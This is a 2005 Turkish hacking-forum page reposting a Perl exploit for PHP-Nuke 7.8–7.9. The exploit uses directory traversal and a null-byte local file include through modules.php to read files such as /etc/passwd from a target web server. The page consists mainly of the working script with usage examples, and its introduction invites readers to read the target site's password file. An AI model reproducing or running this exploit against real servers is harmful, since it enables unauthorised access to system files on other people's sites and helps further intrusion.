Root > Documents > Exploits / Vulnerabilities > Php-Nuke 7.8 Exploit
Cyber-Warrior.Org \ Doküman \ Exploits / Vulnerabilities > Php-Nuke 7.8 Exploit
Madde
  Yazar : SpeXLoW
  Date : 21.10.2005 23:18:58
 
# Php-Nuke 7.8 Exploit
 
Exploit perl dilinde yazilmistir.Hedef sitenin etc/passwd dosyasini okuyabilirsiniz
 
-------------------------------------------------------------------------------
 
#!/usr/bin/perl
use IO::Socket;

# SecurityReason Exploit Code
# by sp3x
# sp3x@securityreason.com
# www.securityreason.com
# Remote Directory Traversal Exploit - Local file include
# PHPNuke -> 7.8 full patched , 7.9 fullpatched + patch 3.1
# Server must have magic_quotes_gpc = Off - need to use %00
# Copyright © SecurityReason. All Rights Reserved.
#
# Example of usage : perl phpnuke-expl.pl 172.24.2.1 nukedir Search ../../../etc/passwd

if (@ARGV < 3)
{
print "\\r\\n";
print "SecurityReason - www.securityreason.com\\r\\n";
print "[sp3x] EXPLOIT for PHPNuke 7.8 - 7.9\\r\\n";
print " \\r\\n";
print "perl phpnuke-expl.pl [Host] [nuke_dir] [file]\\r\\n\\r\\n";
print "[Host] - Host where is phpnuke example: http://localhost\\r\\n";
print "[nuke_dir] - Directory of PHPNuke example: /phpnuke/html/\\r\\n";
print "[module] - Module of PHPNuke example: News\\r\\n";
print "[file] - file to show - example : ../../../../../etc/passwd\\r\\n\\r\\n";
print "Example of usage : perl phpnuke-expl.pl 172.24.2.1 nukedir module ../../../../../e
tc/passwd";
print "\\r\\n";
exit();
}

$HOST = $ARGV[0];
$DIR = $ARGV[1]."modules.php";
$MODULE = "?name=".$ARGV[2]."&";
$FILE = "file=".$ARGV[3]."%00";
$LENGTH = length $FILE;

print "\\r\\n[Host] : ".$HOST."\\n";
print "[Dir] : ".$DIR."\\n";
print "[Module] : ".$ARGV[2]."\\n";
print "[File] : ".$ARGV[3]."\\r\\n\\r\\n";
$HOST =~ s/(http:\\/\\/)//;

$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80"

) || die "Error 404\\r\\n\\r\\n";

print $get1 "GET ".$DIR.$MODULE.$FILE." HTTP/1.0\\n";
print $get1 "Host: ".$HOST."\\n";

print $get1 "User-Agent: Mozilla/5.0 - SecurityReason";
print $get1 "Accept:   text/__xml,application/__xml,application/xhtml+__xml,text/html; q=0 .9,text/
plain;q=0.8,image/png,*/*;q=0.5";
print  $get1 "Accept-Language: pl,en-us;q=0.7,en;q=0.3";
print $get1 "Accept-Encoding: gzip,deflate";
print $get1 "Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7";
print $get1 "Keep-Alive: 300";
print $get1 "cookie: lang=english";
print $get1 "Cache-Control: max-age=0";
print $get1 "Content-Type: application/x-www-form-urlencoded\\n";
print $get1 "Content-Length: ".$LENGTH."\\n\\n";

print $get1 $FILE;

while ($odp = <$get1>)
{
if ($odp =~ /<b>Warning<\\/b>: main\\(\\): Unable to access .\\/$ARGV[2] in <b>/ ) {
printf "\\n\\nFile ".$ARGV[2]." doesn’t exists or something goes wrong.\\r\\n\\r\\n";

exit;
}

printf $odp;
}
   
   
Cyber-Warrior TIM All Legal and illegal Rights Reserved.\CWDoktoray 2001©